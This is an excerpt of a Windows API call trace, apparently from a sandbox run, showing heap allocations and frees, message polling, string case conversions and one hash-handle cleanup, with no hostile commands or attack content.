[0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0195.945] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.945] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.945] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.945] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.946] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.946] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.946] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.947] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.947] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.947] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.947] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0195.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0195.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.950] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0195.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0195.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0195.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.956] 